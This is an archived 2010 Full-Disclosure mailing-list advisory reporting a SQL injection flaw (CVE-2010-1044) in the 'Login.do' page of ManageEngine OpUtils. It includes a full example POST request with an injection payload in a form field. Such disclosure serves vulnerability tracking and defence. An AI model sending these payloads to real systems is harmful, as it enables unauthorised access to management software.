| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sat, 18 Sep 2010 22:33:11 +0530
From: information security <informationhacker08@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: ManageEngine OpUtils 'Login.do' SQL Injection
Vulnerability
http://www.cvedetails.com/cve/CVE-2010-1044/20101044-vulnerable-softwares-references-exploits.html#references
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1044
ManageEngine OpUtils 'Login.do' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example POST request is available:
POST /Login.do HTTP/1.1 Host: localhost:7080 User-Agent: Mozilla/5.0
(Windows; U; Windows NT 6.0; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
(.NET CLR 3.5.30729) Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115
Proxy-Connection: keep-alive Referer:
http://www.example.com/Login.doCookie:
JSESSIONID=738A4E8130CBE2A0D5E857D9EBF9820E; 32=temp; 83=temp
Content-Type: application/x-www-form-urlencoded Content-Length: 136
cookieexists=true&username=asheesh&password=asheesh&logonsubmit=+&log=WARNING&locationUrl=localhost&isHttpPort=false"+and+31337-31337="0
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists